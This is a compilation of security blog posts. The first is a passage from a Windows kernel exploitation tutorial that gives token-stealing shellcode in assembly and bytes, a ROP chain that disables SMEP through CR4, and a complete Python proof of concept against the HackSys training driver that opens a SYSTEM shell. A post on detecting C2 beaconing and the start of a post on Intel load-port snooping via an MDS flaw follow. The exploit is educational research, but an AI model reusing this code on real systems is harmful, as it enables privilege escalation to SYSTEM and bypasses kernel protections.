Notice that I copied the current process, stored in RAX, into RBX as well. You will see why this is needed here shortly.

Take Me For A Loop!

Let’s take a look at a few more elements of the _EPROCESS structure.

dt nt!_EPROCESS

Let’s take a look at the data structure of ActiveProcessLinks, _LIST_ENTRY

dt nt!_LIST_ENTRY

ActiveProcessLinks is what keeps track of the list of current processes. How does it keep track of these processes you may be wondering? Its data structure is _LIST_ENTRY, a doubly linked list. This means that each element in the linked list not only points to the next element, but it also points to the previous one. Essentially, the elements point in each direction. As mentioned earlier and just as a point of reiteration, this linked list is responsible for keeping track of all active processes.

There are two elements of _EPROCESS we need to keep track of. The first element, located at an offset of 0x2e0 on Windows 10 x64, is UniqueProcessId. This is the PID of the process. The other element is ActiveProcessLinks, which is located at an offset 0x2e8.

So essentially what we can do in x64 assembly, is locate the current process from the aforementioned method of PsGetCurrentProcess(). From there, we can iterate and loop through the _EPROCESS structure’s ActiveLinkProcess element (which keeps track of every process via a doubly linked list). After reading in the current ActiveProcessLinks element, we can compare the current UniqueProcessId (PID) to the constant 4, which is the PID of the SYSTEM process. Let’s continue our already started assembly program.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	; Current process (_EPROCESS)
  	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
	
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

Once the SYSTEM process’s _EPROCESS structure has been found, we can now go ahead and retrieve the token and copy it to our current process. This will unleash God mode on our current process. God, please have mercy on the soul of our poor little process.

Once we have found the SYSTEM process, remember that the Token element is located at an offset of 0x358 to the _EPROCESS structure of the process.

Let’s finish out the rest of our token stealing payload for Windows 10 x64.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process

	xor rax, rax			; set NTSTATUS SUCCESS
	ret				; Done!

Notice our use of bitwise AND. We are clearing out the last 4 bits of the RCX register, via the CL register. If you have read my post about a socket reuse exploit, you will know I talk about using the lower byte registers of the x86 or x64 registers (RCX, ECX, CX, CH, CL, etc). The last 4 bits we need to clear out , in an x64 architecture, are located in the low or L 8-bit register (CL, AL, BL, etc).

As you can see also, we ended our shellcode by using bitwise XOR to clear out RAX. NTSTATUS uses RAX as the regsiter for the error code. NTSTATUS, when a value of 0 is returned, means the operations successfully performed.

Before we go ahead and show off our payload, let’s develop an exploit that outlines bypassing SMEP. We will use a stack overflow as an example, in the kernel, to outline using ROP to bypass SMEP.

SMEP Says Hello

What is SMEP? SMEP, or Supervisor Mode Execution Prevention, is a protection that was first implemented in Windows 8 (in context of Windows). When we talk about executing code for a kernel exploit, the most common technique is to allocate the shellcode in user mode and the call it from the kernel. This means the user mode code will be called in context of the kernel, giving us the applicable permissions to obtain SYSTEM privileges.

SMEP is a prevention that does not allow us execute code stored in a ring 3 page from ring 0 (executing code from a higher ring in general). This means we cannot execute user mode code from kernel mode. In order to bypass SMEP, let’s understand how it is implemented.

SMEP policy is mandated/enabled via the CR4 register. According to Intel, the CR4 register is a control register. Each bit in this register is responsible for various features being enabled on the OS. The 20th bit of the CR4 register is responsible for SMEP being enabled. If the 20th bit of the CR4 register is set to 1, SMEP is enabled. When the bit is set to 0, SMEP is disabled. Let’s take a look at the CR4 register on Windows with SMEP enabled in normal hexadecimal format, as well as binary (so we can really see where that 20th bit resides).

r cr4

The CR4 register has a value of 0x00000000001506f8 in hexadecimal. Let’s view that in binary, so we can see where the 20th bit resides.

.formats cr4

As you can see, the 20th bit is outlined in the image above (counting from the right). Let’s use the .formats command again to see what the value in the CR4 register needs to be, in order to bypass SMEP.

As you can see from the above image, when the 20th bit of the CR4 register is flipped, the hexadecimal value would be 0x00000000000506f8.

This post will cover how to bypass SMEP via ROP using the above information. Before we do, let’s talk a bit more about SMEP implementation and other potential bypasses.

SMEP is ENFORCED via the page table entry (PTE) of a memory page through the form of “flags”. Recall that a page table is what contains information about which part of physical memory maps to virtual memory. The PTE for a memory page has various flags that are associated with it. Two of those flags are U, for user mode or S, for supervisor mode (kernel mode). This flag is checked when said memory is accessed by the memory management unit (MMU). Before we move on, lets talk about CPU modes for a second. Ring 3 is responsible for user mode application code. Ring 0 is responsible for operating system level code (kernel mode). The CPU can transition its current privilege level (CPL) based on what is executing. I will not get into the lower level details of syscalls, sysrets, or other various routines that occur when the CPU changes the CPL. This is also not a blog on how paging works. If you are interested in learning more, I HIGHLY suggest the book What Makes It Page: The Windows 7 (x64) Virtual Memory Manager by Enrico Martignetti. Although this is specific to Windows 7, I believe these same concepts apply today. I give this background information, because SMEP bypassses could potentially abuse this functionality.

Think of the implementation of SMEP as the following:

Laws are created by the government. HOWEVER, the legislatures do not roam the streets enforcing the law. This is the job of our police force.

The same concept applies to SMEP. SMEP is enabled by the CR4 register- but the CR4 register does not enforce it. That is the job of the page table entries.

Why bring this up? Athough we will be outlining a SMEP bypass via ROP, let’s consider another scenario. Let’s say we have an arbitrary read and write primitive. Put aside the fact that PTEs are randomized for now. What if you had a read primitive to know where the PTE for the memory page of your shellcode was? Another potential (and interesting) way to bypass SMEP would be not to “disable SMEP” at all. Let’s think outside the box! Instead of “going to the mountain”- why not “bring the mountain to us”? We could potentially use our read primitive to locate our user mode shellcode page, and then use our write primitive to overwrite the PTE for our shellcode and flip the U (usermode) flag into an S (supervisor mode) flag! That way, when that particular address is executed although it is a “user mode address”, it is still executed because now the permissions of that page are that of a kernel mode page.

Although page table entries are randomized now, this presentation by Morten Schenk of Offensive Security talks about derandomizing page table entries.

Morten explains the steps as the following, if you are too lazy to read his work:

  1. Obtain read/write primitive
  2. Leak ntoskrnl.exe (kernel base)
  3. Locate MiGetPteAddress() (can be done dynamically instead of static offsets)
  4. Use PTE base to obtain PTE of any memory page
  5. Change bit (whether it is copying shellcode to page and flipping NX bit or flipping U/S bit of a user mode page)

Again, I will not be covering this method of bypassing SMEP until I have done more research on memory paging in Windows. See the end of this blog for my thoughts on other SMEP bypasses going forward.

SMEP Says Goodbye

Let’s use the an overflow to outline bypasssing SMEP with ROP. ROP assumes we have control over the stack (as each ROP gadget returns back to the stack). Since SMEP is enabled, our ROP gagdets will need to come from kernel mode pages. Since we are assuming medium integrity here, we can call EnumDeviceDrivers() to obtain the kernel base- which bypasses KASLR.

Essentially, here is how our ROP chain will work

-------------------
pop <reg> ; ret
-------------------
VALUE_WANTED_IN_CR4 (0x506f8) - This can be our own user supplied value.
-------------------
mov cr4, <reg> ; ret
-------------------
User mode payload address
-------------------

Let’s go hunting for these ROP gadgets. (NOTE - ALL OFFSETS TO ROP GADGETS WILL VARY DEPENDING ON OS, PATCH LEVEL, ETC.) Remember, these ROP gadgets need to be kernel mode addresses. We will use rp++ to enumerate rop gadgets in ntoskrnl.exe. If you take a look at my post about ROP, you will see how to use this tool.

Let’s figure out a way to control the contents of the CR4 register. Although we won’t probably won’t be able to directly manipulate the contents of the register directly, perhaps we can move the contents of a register that we can control into the CR4 register. Recall that a pop <reg> operation will take the contents of the next item on the stack, and store it in the register following the pop operation. Let’s keep this in mind.

Using rp++, we have found a nice ROP gadget in ntoskrnl.exe, that allows us to store the contents of CR4 in the ecx register (the “second” 32-bits of the RCX register.)

As you can see, this ROP gadget is “located” at 0x140108552. However, since this is a kernel mode address- rp++ (from usermode and not ran as an administrator) will not give us the full address of this. However, if you remove the first 3 bytes, the rest of the “address” is really an offset from the kernel base. This means this ROP gadget is located at ntoskrnl.exe + 0x108552.

Awesome! rp++ was a bit wrong in its enumeration. rp++ says that we can put ECX into the CR4 register. Howerver, upon further inspection, we can see this ROP gadget ACTUALLY points to a mov cr4, rcx instruction. This is perfect for our use case! We have a way to move the contents of the RCX register into the CR4 register. You may be asking “Okay, we can control the CR4 register via the RCX register- but how does this help us?” Recall one of the properties of ROP from my previous post. Whenever we had a nice ROP gadget that allowed a desired intruction, but there was an unecessary pop in the gadget, we used filler data of NOPs. This is because we are just simply placing data in a register- we are not executing it.

The same principle applies here. If we can pop our intended flag value into RCX, we should have no problem. As we saw before, our intended CR4 register value should be 0x506f8.

Real quick with brevity- let’s say rp++ was right in that we could only control the contents of the ECX register (instead of RCX). Would this affect us?

Recall, however, how the registers work here.

-----------------------------------
               RCX
-----------------------------------
                       ECX
-----------------------------------
                             CX
-----------------------------------
                           CH    CL
-----------------------------------

This means, even though RCX contains 0x00000000000506f8, a mov cr4, ecx would take the lower 32-bits of RCX (which is ECX) and place it into the CR4 register. This would mean ECX would equal 0x000506f8- and that value would end up in CR4. So even though we would theoretically using both RCX and ECX, due to lack of pop ecx ROP gadgets, we will be unaffected!

Now, let’s continue on to controlling the RCX register.

Let’s find a pop rcx gadget!

Nice! We have a ROP gadget located at ntoskrnl.exe + 0x3544. Let’s update our POC with some breakpoints where our user mode shellcode will reside, to verify we can hit our shellcode. This POC takes care of the semantics such as finding the offset to the ret instruction we are overwriting, etc.

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\xCC" * 50
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = "\x41" * 2056

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		# Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

Let’s take a look in WinDbg.

As you can see, we have hit the ret we are going to overwrite.

Before we step through, let’s view the call stack- to see how execution will proceed.

k

Open the image above in a new tab if you are having trouble viewing.

To help better understand the output of the call stack, the column Call Site is going to be the memory address that is executed. The RetAddr column is where the Call Site address will return to when it is done completing.

As you can see, the compromised ret is located at HEVD!TriggerStackOverflow+0xc8. From there we will return to 0xfffff80302c82544, or AuthzBasepRemoveSecurityAttributeValueFromLists+0x70. The next value in the RetAddr column, is the intended value for our CR4 register, 0x00000000000506f8.

Recall that a ret instruction will load RSP into RIP. Therefore, since our intended CR4 value is located on the stack, technically our first ROP gadget would “return” to 0x00000000000506f8. However, the pop rcx will take that value off of the stack and place it into RCX. Meaning we do not have to worry about returning to that value, which is not a valid memory address.

Upon the ret from the pop rcx ROP gadget, we will jump into the next ROP gadget, mov cr4, rcx, which will load RCX into CR4. That ROP gadget is located at 0xfffff80302d87552, or KiFlushCurrentTbWorker+0x12. To finish things out, we have the location of our user mode code, at 0x0000000000b70000.

After stepping through the vulnerable ret instruction, we see we have hit our first ROP gadget.

Now that we are here, stepping through should pop our intended CR4 value into RCX

Perfect. Stepping through, we should land on our next ROP gadget- which will move RCX (desired value to disable SMEP) into CR4.

Perfect! Let’s disable SMEP!

Nice! As you can see, after our ROP gadgets are executed - we hit our breakpoints (placeholder for our shellcode to verify SMEP is disabled)!

This means we have succesfully disabled SMEP, and we can execute usermode shellcode! Let’s finalize this exploit with a working POC. We will merge our payload concepts with the exploit now! Let’s update our script with weaponized shellcode!

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xE8\x02\x00\x00"                      # mov rbx,[rbx+0x2e8] ; ActiveProcessLinks
    "\x48\x81\xEB\xE8\x02\x00\x00"                      # sub rbx,0x2e8       ; Go back to current process
    "\x48\x8B\x8B\xE0\x02\x00\x00"                      # mov rcx,[rbx+0x2e0] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x348
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x83\xC4\x40"                                  # add rsp, 0x40       ; RESTORE (Specific to HEVD)
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = ("\x41" * 2056)

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		        # Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

os.system("cmd.exe /k cd C:\\")

This shellcode adds 0x40 to RSP as you can see from above. This is specific to the process I was exploiting, to resume execution. Also in this case, RAX was already set to 0. Therefore, there was no need to xor rax, rax.

As you can see, SMEP has been bypassed!

SMEP Bypass via PTE Overwrite

Perhaps in another blog I will come back to this. I am going to go back and do some more research on the memory manger unit and memory paging in Windows. When that research has concluded, I will get into the low level details of overwriting page table entries to turn user mode pages into kernel mode pages. In addition, I will go and do more research on pool memory in kernel mode and look into how pool overflows and use-after-free kernel exploits function and behave.

Thank you for joining me along this journey! And thank you to Morten Schenk, Alex Ionescu, and Intel. You all have aided me greatly.

Please feel free to contact me with any suggestions, comments, or corrections! I am open to it all.

Peace, love, and positivity :-)

Hunting for beacons

By: Fox IT
15 January 2020 at 11:29

Author: Ruud van Luijk

Attacks need to have a form of communication with their victim machines, also known as Command and Control (C2) [1]. This can be in the form of a continuous connection or connect the victim machine directly. However, it’s convenient to have the victim machine connect to you. In other words: It has to communicate back. This blog describes a method to detect one technique utilized by many popular attack frameworks based solely on connection metadata and statistics, in turn enabling this technique to be used on multiple log sources.

Many attack frameworks use beaconing

Frameworks like Cobalt Strike, PoshC2, and Empire, but also some run-in-the-mill malware, frequently check-in at the C2 server to retrieve commands or to communicate results back. In Cobalt Strike this is called a beacon, but concept is similar for many contemporary frameworks. In this blog the term ‘beaconing’ is used as a general term for the call-backs of malware. Previous fingerprinting techniques shows that there are more than a thousand Cobalt Strike servers online in a month that are actively used by several threat actors, making this an important point to focus on.

While the underlying code differs slightly from tool to tool, they often exist of two components to set up a pattern for a connection: a sleep and a jitter. The sleep component indicates how long the beacon has to sleep before checking in again, and the jitter modifies the sleep time so that a random pattern emerges. For example: 60 seconds of sleep with 10% jitter results in a uniformly random sleep between 54 and 66 seconds (PoshC2 [3], Empire [4]) or a uniformly random sleep between 54 and 60 seconds (Cobalt Strike [5]). Note the slight difference in calculation.

This jitter weakens the pattern but will not dissolve the pattern entirely. Moreover, due to the uniform distribution used for the sleep function the jitter is symmetrical. This is in our advantage while detecting this behaviour!

Detecting the beacon

While static signatures are often sufficient in detecting attacks, this is not the case for beaconing. Most frameworks are very customizable to your needs and preferences. This makes it hard to write correct and reliable signatures. Yet, the pattern does not change that much. Therefore, our objective is to find a beaconing pattern in seemingly pattern less connections in real-time using a more anomaly-based method. We encourage other blue teams/defenders to do the same.

Since the average and median of the time between the connections is more or less constant, we can look for connections where the times between consecutive connections constantly stay within a certain range. Regular traffic should not follow such pattern. For example, it makes a few fast-consecutive connections, then a longer time pause, and then again, some interaction. Using a wider range will detect the beacons with a lot of jitter, but more legitimate traffic will also fall in the wider range. There is a clear trade-off between false positives and accounting for more jitter.

In order to track the pattern of connections, we create connection pairs. For example, an IP that connects to a certain host, can be expressed as ’10.0.0.1 -> somerandomhost.com”. This is done for all connection pairs in the network. We will deep dive into one connection pair.

The image above illustrates a beacon is simulated for the pair ’10.0.0.1 -> somerandomhost.com” with a sleep of 1 second and a jitter of 20%, i.e. having a range between 0.8 and 1.2 seconds and the model is set to detect a maximum of 25% jitter. Our model follows the expected timing of the beacon as all connections remain within the lower and upper bound. In general, the more a connection reside within this bandwidth, the more likely it is that there is some sort of beaconing. When a beacon has a jitter of 50% our model has a bandwidth of 25%, it is still expected that half of the beacons will fall within the specified bandwidth.

Even when the configuration of the beacon changes, this method will catch up. The figure above illustrates a change from one to two seconds of sleep whilst maintaining a 10% beaconing. There is a small period after the change where the connections break through the bandwidth, but after several connections the model catches up.

This method can work with any connection pair you want to track. Possibilities include IPs, HTTP(s) hosts, DNS requests, etc. Since it works on only the metadata, this will also help you to hunt for domain fronted beacons (keeping in mind your baseline).

Keep in mind the false positives

Although most regular traffic will not follow a constant pattern, this method will most likely result in several false positives. Every connection that runs on a timer will result in the exact same pattern as beaconing. Example of such connections are windows telemetry, software updates, and custom update scripts. Therefore, some baselining is necessary before using this method for alerting. Still, hunting will always be possible without baselining!

Conclusion

Hunting for C2 beacons proves to be a worthwhile exercise. Real world scenarios confirm the effectiveness of this approach. Depending on the size of the network logs, this method can plow through a month of logs within an hour due to the simplicity of the method. Even when the hunting exercise did not yield malicious results, there are often other applications that act on specific time intervals and are also worth investigating, removing, or altering. While this method will not work when an adversary uses a 100% jitter. Keep in mind that this will probably annoy your adversary, so it’s still a win!

References:

[1]. https://attack.mitre.org/tactics/TA0011/

[2]. https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/

[3]. https://github.com/nettitude/PoshC2/blob/master/C2-Server.ps1

https://github.com/nettitude/PoshC2_Python/blob/4aea6f957f4aec00ba1f766b5ecc6f3d015da506/Files/Implant-Core.ps1

[4]. https://github.com/EmpireProject/Empire/blob/master/data/agent/agent.ps1

[5]. https://www.cobaltstrike.com/help-beacon

CPU Introspection: Intel Load Port Snooping

30 December 2019 at 04:11

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!


Foreward

First of all, I’d like to say that I’m super excited to write up this blog. This is an idea I’ve had for over a year and I only recently got to working on. The initial implementation and proof-of-concept of this idea was actually implemented live on my Twitch! This proof-of-concept went from nothing at all to a fully-working-as-predicted implementation in just about 3 hours! Not only did the implementation go much smoother than expected, the results are by far higher resolution and signal-to-noise than I expected!

This blog is fairly technical, and thus I highly recommend that you read my previous blog on Sushi Roll, my CPU research kernel where this technique was implemented. In the Sushi Roll blog I go a little bit more into the high-level details of Intel micro-architecture and it’s a great introduction to the topic if you’re not familiar.

YouTube video for PoC
implementation

Recording of the stream where we implemented this idea as a proof-of-concept. Click for the YouTube video!


Summary

We’re going to go into a unique technique for observing and sequencing all load port traffic on Intel processors. By using a CPU vulnerability from the MDS set of vulnerabilities, specifically multi-architectural load port data sampling (MLPDS, CVE-2018-12127), we are able to observe values which fly by on the load ports. Since (to my knowledge) all loads must end up going through load ports, regardless of requestor, origin, or caching, this means in theory, all contents of loads ever performed can be observed. By using a creative scanning technique we’re able to not only view “random” loads as they go by, but sequence loads to determine the ordering and timing of them.

We’ll go through some examples demonstrating that this technique can be used to view all loads as they are performed on a cycle-by-cycle basis. We’ll look into an interesting case of the micro-architecture updating accessed and dirty bits using a microcode assist. These are invisible loads dispatched on the CPU on behalf of the user when a page is accessed for the first time.

Why

As you may be familiar, x86 is quite a complex architecture with many nooks and crannies. As time has passed it has only gotten more complex, leading to fewer known behaviors of the inner workings. There are many instructions with complex microcode invocations which access memory as were seen through my work on Sushi Roll. This led to me being curious as to what is actually going on with load ports during some of these operations.

Intel CPU traffic during a normal
write

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during a traditional memory write

Intel CPU traffic during a write requiring dirty/accessed
updates

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during the same memory write as above, but this time where the page table entries need an accessed/dirty bit update

Beyond just directly invoked microcode due to instructions being executed, microcode also gets executed on the processor during “microcode assists”. These operations, while often undocumented, are referenced a few times throughout Intel manuals. Specifically in the Intel Optimization Manual there are references to microcode assists during accessed and dirty bit updates. Further, there is a restriction on TSX sections such that they may abort when accessed and dirty bits need to be updated. These microcode assists are fascinating to me, as while I have no evidence for it, I suspect they may be subject to different levels of permissions and validations compared to traditional operations. Whenever I see code executing on a processor as a side-effect to user operations, all I think is: “here be dragons”.


A playground for CPU bugs

When I start auditing a target, the first thing that I try to do is get introspection into what is going on. If the target is an obscure device then I’ll likely try to find some bug that allows me to image the entire device, and load it up in an emulator. If it’s some source code I have that is partial, then I’ll try to get some sort of mocking of the external calls it’s making and implement them as I come by them. Once I have the target running on my terms, and not the terms of some locked down device or environment, then I’ll start trying to learn as much about it as possible…

This is no different from what I did when I got into CPU research. Starting with when Meltdown and Spectre came out I started to be the go-to person for writing PoCs for CPU bugs. I developed a few custom OSes early on that were just designed to give a pass/fail indicator if a CPU bug were able to be exploited in a given environment. This was critical in helping test the mitigations that went in place for each CPU bug as they were reported, as testing if these mitigations worked is a surprisingly hard problem.

This led to me having some cleanly made OS-level CPU exploits written up. The custom OS proved to be a great way to test the mitigations, especially as the signal was much higher compared to a traditional OS. In fact, the signal was almost just a bit too strong…

When in a custom operating system it’s a lot easier to play around with weird behaviors of the CPU, without worrying about it affecting the system’s stability. I can easily turn off interrupts, overwrite exception handlers with specialized ones, change MSRs to weird CPU states, and so on. This led to me ending up with almost a playground for CPU vulnerability testing with some pretty standard primitives.

As the number of primitives I had grew, I was able to PoC out a new CPU bug in typically under a day. But then I had to wonder… what would happen if I tried to get the most information out of the processor as possible.


Sushi Roll

And that was the starting of Sushi Roll, my CPU research kernel. I have a whole blog about the Sushi Roll research kernel, and I strongly recommend you read it! Effectively Sushi Roll is a custom kernel with message passing between cores rather than memory sharing. This means that each core has a complete copy of the kernel with no shared accesses. For attacks which need to observe the faintest signal in memory behaviors, this lead to a great amount of isolation.

When looking for a behavior you already understand on a processor, it’s pretty easy to get a signal. But, when doing initial CPU research into the unknowns and undefined behavior, getting this signal out takes every advantage as you can get. Thus in this low-noise CPU research environment, even the faintest leak would cause a pretty large disruption in determinism, which would likely show up as a measurable result earlier than traditional blind CPU research would allow.

Performance Counter Monitoring

In Sushi Roll I implemented a creative technique for monitoring the values in performance counters along with time-stamping them in cycles. Some of the performance counters in Intel processors count things like the number of micro-ops dispatched to each of the execution units on the core. Some of these counters increase during speculation, and with this data and time-stamping I was able to get some of the first-ever insights into what processor behavior was actually occurring during speculation!

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Being able to collect this sort of data immediately made unexpected CPU behaviors easier to catalog, measure, and eventually make determinstic. The more understanding we can get of the internals of the CPU, the better!


The Ultimate Goal

The ultimate goal of my CPU research is to understand so thoroughly how the Intel micro-architecture works that I can predict it with emulation models. This means that I would like to run code through an emulated environment and it would tell me exactly how many internal CPU resources would be used, which lines from caches and buffers would be evicted and what contents they would hold. There’s something beautiful to me to understanding something so well that you can predict how it will behave. And so the journey begins…

Past Progress

So far with the work in Sushi Roll we’ve been able to observe how the CPU dispatches uops during specific portions of code. This allows us to see which CPU resources are used to fulfill certain requests, and thus can provide us with a rough outline of what is happening. With simple CPU operations this is often all we need, as there are only so many ways to perform a certain operation, the complete picture can usually be drawn just from guessing “how they might have done it”. However, when more complex operations are involved, all of that goes out the window.

When reading through Intel manuals I saw many references to microcode assists. These are “situations” in your processor which may require microcode to be dispatched to execution units to perform some complex-ish logic. These are typically edge cases which don’t occur frequently enough for the processor to worry about handling them in hardware, rather just needing to detect them and cause some assist code to run. We know of one microcode assist which is relatively easy to trigger, updating the accessed and dirty bits in the page tables.

Accessed and dirty bits

